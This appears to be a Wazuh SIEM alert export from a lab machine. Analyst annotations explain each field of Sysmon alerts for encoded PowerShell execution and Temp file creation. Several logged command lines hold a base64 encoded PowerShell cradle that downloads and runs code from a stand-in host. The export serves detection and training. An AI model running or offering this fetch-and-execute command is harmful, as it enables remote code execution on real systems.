🔍 Full Alert Details
timestamp:  2025-04-24T22:55:43.204+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  116
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535343.2697576
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:55:38.7316316Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350329
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:55:33.660 ProcessGuid: {94294ddc-c165-680a-d60c-000000000e00} ProcessId: 7424 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c161-680a-d10c-000000000e00} ParentProcessId: 5124 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:55:33.660
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c165-680a-d60c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  7424
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-c161-680a-d10c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  5124
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:55:43.247+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:55:43.247+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  120
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535343.2705639
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:55:40.0213264Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350331
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:55:39.967 ProcessGuid: {94294ddc-c165-680a-d60c-000000000e00} ProcessId: 7424 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_2tf3tc0d.fi2.ps1 CreationUtcTime: 2025-04-24 22:55:39.967 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:55:39.967
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c165-680a-d60c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  7424
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_2tf3tc0d.fi2.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:55:39.967
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:55:44.760+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:55:44.760+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  117
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535344.2708404
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:55:42.7324746Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350363
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:55:41.633 ProcessGuid: {94294ddc-c16d-680a-df0c-000000000e00} ProcessId: 9948 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c165-680a-d60c-000000000e00} ParentProcessId: 7424 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:55:41.633
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c16d-680a-df0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9948
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-c165-680a-d60c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  7424
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:55:44.776+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:55:44.776+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  121
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535344.2716467
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:55:42.9929079Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350364
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:55:42.952 ProcessGuid: {94294ddc-c16d-680a-df0c-000000000e00} ProcessId: 9948 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_gaycvjfa.rkm.ps1 CreationUtcTime: 2025-04-24 22:55:42.952 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:55:42.952
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c16d-680a-df0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9948
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_gaycvjfa.rkm.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:55:42.952
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:55:47.435+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:55:47.435+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
